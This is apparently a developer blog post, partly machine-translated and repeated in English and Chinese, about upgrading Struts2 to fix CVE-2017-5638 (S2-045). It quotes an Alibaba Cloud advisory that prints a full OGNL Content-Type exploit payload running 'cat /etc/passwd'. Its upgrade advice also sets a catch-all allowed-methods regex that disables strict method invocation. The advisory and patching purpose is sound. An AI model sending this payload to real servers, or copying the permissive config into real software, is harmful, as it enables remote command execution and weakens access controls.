Since computers originated in the United States, many emerging technologies and frameworks also originated from some large companies in the United States. Although domestic BAT has also made some contributions to open source technology, it still lacks user support at present. This has also led to a large number of domestic Internet companies relying heavily on foreign technology. If there are high-risk vulnerabilities in some open source frameworks, it will affect a large number of Chinese Internet companies.
Recently , Struts2 broke another high-risk vulnerability, which is said to affect more than half of China's Internet . Covering various industries such as finance, education, medical care, and e-commerce. So how did this high-risk vulnerability come about? This article will explain in detail for you!
Struts2 Vulnerability Summary
On March 6, 2017, Apache Struts2 was exposed to a remote command execution vulnerability. Vulnerability number: S2-045 , CVE number: CVE-2017-5638, and the official rating is high. The vulnerability is due to the use of the file upload function based on the Jakarta plugin. Under certain conditions, a malicious user can trigger the vulnerability by modifying the Content-Type value in the HTTP request header, and then execute arbitrary system commands, resulting in the system being hacked.
Vulnerability analysis, please move: Alibaba Cloud helps cloud users deal with high-risk Struts2 vulnerabilities
Vulnerability Solutions
If this version is between Struts2.3.5 to Struts2.3.31 and Struts2.5 to Struts2.5.10, there are loopholes, please upgrade to struts 2.3.32 or 2.5.10.1 version (beep the dog, the company is still using struts2 ).
Since the current version is struts2-core-2.3.28, I quickly upgraded to the next level, skipping 2.3 and directly upgrading to version 2.5.
Upgrade Instructions
class not found
java.lang.ClassNotFoundException: org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter
|
Looking at the source code, the package path has been changed in version 2.5.
<
filter
>
<
filter-name
>struts2</
filter-name
>
<
filter-class
>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter</
filter-class
>
</
filter
>
|
Configured but can't find Action
what's the situation? Do you have any doubts about life? Go to http://struts.apache.org/ struts2's official website.
Due to the large version span, the 2.5 version has upgraded many features. In Struts 2.5, strict DMI is extended, which is called strict method invocation aka SMI. You can imagine DMI as a "border police" and SMI as a "tax police" and keep an eye on the inside. With this release, SMI is enabled by default (the strict-method-invocation property is set to true by default in the struts-default package), and you can choose to disable it per package - there is no global switch to disable SMI for the entire application.
SMI works as follows:
<allowed-methods> / @AllowedMethods 被定义每个动作 - SMI工作,而不打开它,但只是那些动作(加上<global-allowed-methods/>)
SMI已启用,但没有<allowed-methods> / @AllowedMethods 被定义 - SMI工作,但只有<global-allowed-methods/>
SMI已禁用 - 允许调用任何与默认RegEx匹配的操作方法 - ([A-Za-z0-9_$]*)
您可以使用常量重新定义默认RegEx,如下所示 <constant name="struts.strictMethodInvocation.methodRegex" value="([a-zA-Z]*)"/>
在操作定义中使用通配符映射时,SMI有两种方式:
SMI被禁用 - 任何通配符将被替换为默认的RegEx,即:<action name="Person*" method="perform*">将被翻译成allowedMethod = "regex:perform([A-Za-z0-9_$]*)".
启用SMI - 不会发生通配符替换,必须严格定义通过注释或<allowed-method/>标记可以访问哪些方法。
|
That is to say, you must add this configuration, it is best to set it globally:
<global-allowed-methods>regex:.*</global-allowed-methods>
|
The problem with the order of elements in the package
元素类型为 "package" 的内容必须匹配 "(result-types?,interceptors?,default-interceptor-ref?,default-action-ref?
|
When this error occurs, you should pay attention. Be sure to check the location of global-allowed-methods in the package, and then place the configuration in the order specified by the error.
other problems
If you use log4j instead of log4j2 in your project, then the problem is coming, you also need to add log4j-api-2.7.jar and log4j-core-2.7.jar, and configure log4j2.xml (it is empty for now) .
<?
xml
version
=
"1.0"
encoding
=
"UTF-8"
?>
<
configuration
status
=
"error"
>
<
appenders
>
</
appenders
>
<
loggers
>
<
root
level
=
"info"
>
</
root
>
</
loggers
>
</
configuration
>
|
Otherwise, the following error will be reported all the time. As for why, I haven't understood it in depth.
ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console.
Ali Cloud:
On March 6, 2017, Apache Struts2 was exposed to a remote command execution vulnerability. Vulnerability number: S2-045, CVE number: CVE-2017-5638, the official rating is high risk, the vulnerability is due to the use of the file upload function based on the Jakarta plugin Under certain conditions, a malicious user can trigger the vulnerability by modifying the Content-Type value in the HTTP request header, and then execute arbitrary system commands, resulting in the system being hacked.
After completing the vulnerability rating and confirming the scope of impact, the Alibaba Cloud security emergency response team quickly started the emergency response process, analyzed the cause of the vulnerability, and quickly issued an official security vulnerability warning notice.
公告全文:https://help.aliyun.com/noticelist/articleid/20273580.html
联动响应 零安全事件
在流程启动启动的同时,阿里云云盾的各个产品联动响应,帮助用户应对Struts2漏洞。安骑士迅速完成云上ECS安全检测,态势感知用行为检测功能精准捕捉攻击源IP,Web应用防火墙在次日上午成功升级防护规则,帮助用户有效拦截利用该漏洞发起的攻击。
通过及时地检测、通知和规则升级,所有阿里云云盾用户均未因此漏洞发生安全事件。
漏洞分析
0x00 漏洞公告
根据官方的漏洞公告
https://cwiki.apache.org/confluence/display/WW/S2-045
可以看出漏洞的主要原因是出现在Content-Type
It is possible to perform aRCE attack with a malicious Content-Type value. If the Content-Type value isn'tvalid an exception is thrown which is then used to display an error message toa users.
通过http header中的Content-Type,注入OGNL语句来进行远程命令执行。
Struts2在对于异常的处理时出现了问题。
0x01 影响范围
受影响的版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
0x02 漏洞危害
- 测试环境:tomcat7,Struts2.3.16
- 测试过程:在上传页面拦截请求的数据包
在http header里增加一个Content-Type的key,value就是我们的poc
%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
全球攻击分布态势
修复建议
- 对于使用了基于Jakarta实现文件上传Multipart解析器,检测方式查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar ,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,请升级到struts 2.3.32或2.5.10.1版本。
- 使用其它方式实现文件上传的Multipart解析器。
- 使用第三方的防护设备进行防护。
- 删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)。
- 阿里云云盾Web应用防火墙已经支持该漏洞防御,点击这里可查看介绍。
前情概要
漏洞年年有,最近特别多。2017年3月6日,Apache Struts2被曝存在远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行任意系统命令,导致系统被黑客入侵。
漏洞分析请移步:https://yq.aliyun.com/articles/72008
建议
如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞,请升级到struts 2.3.32或2.5.10.1版本(毕了狗了,公司还在用struts2)。
由于目前使用版本是struts2-core-2.3.28,于是赶紧升了下级别,略过2.3 直接升级到2.5版本。
升级说明
一、找不到类
java.lang.ClassNotFoundException: org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter找不到那得多正常,查看了一下源码,2.5版本已变更了包路径。
<filter> <filter-name>struts2</filter-name> <filter-class> org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter </filter-class> </filter>二、配置好了居然找不到Action
是不是有点怀疑人生了,赶紧去http://struts.apache.org/ struts2的官网扒拉扒拉。
Due to the large version span, the 2.5 version has upgraded many features. In Struts 2.5, strict DMI is extended, which is called strict method invocation aka SMI. You can imagine DMI as a "border police" and SMI as a "tax police" and keep an eye on the inside. With this release, SMI is enabled by default (the strict-method-invocation property is set to true by default in the struts-default package), and you can choose to disable it per package - there is no global switch to disable SMI for the entire application.
SMI的工作原理如下: <allowed-methods> / @AllowedMethods 被定义每个动作 - SMI工作,而不打开它,但只是那些动作(加上<global-allowed-methods/>) SMI已启用,但没有<allowed-methods> / @AllowedMethods 被定义 - SMI工作,但只有<global-allowed-methods/> SMI已禁用 - 允许调用任何与默认RegEx匹配的操作方法 - ([A-Za-z0-9_$]*) 您可以使用常量重新定义默认RegEx,如下所示 <constant name="struts.strictMethodInvocation.methodRegex" value="([a-zA-Z]*)"/> 在操作定义中使用通配符映射时,SMI有两种方式: SMI被禁用 - 任何通配符将被替换为默认的RegEx,即:<action name="Person*" method="perform*">将被翻译成allowedMethod = "regex:perform([A-Za-z0-9_$]*)". 启用SMI - 不会发生通配符替换,必须严格定义通过注释或<allowed-method/>标记可以访问哪些方法。That is to say, you must add this configuration, it is best to set it globally:
<global-allowed-methods>regex:.*</global-allowed-methods>3. The problem of the order of elements in the package
元素类型为 "package" 的内容必须匹配 "(result-types?,interceptors?,default-interceptor-ref?,default-action-ref?When this error occurs, you should pay attention. Be sure to check the location of global-allowed-methods in the package, and then place the configuration in the order specified by the error.
4. Problems that may arise
If you use log4j instead of log4j2 in your project, then the problem is coming, you also need to add log4j-api-2.7.jar and log4j-core-2.7.jar, and configure log4j2.xml (it is empty for now) .
<?xml version="1.0" encoding="UTF-8"?> <configuration status="error"> <appenders> </appenders> <loggers> <root level="info"> </root> </loggers> </configuration>Otherwise, the following error will be reported all the time. As for why, I haven't understood it in depth.
ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console.Well, if there are no other problems with startup, you should be able to access the long-lost Action.
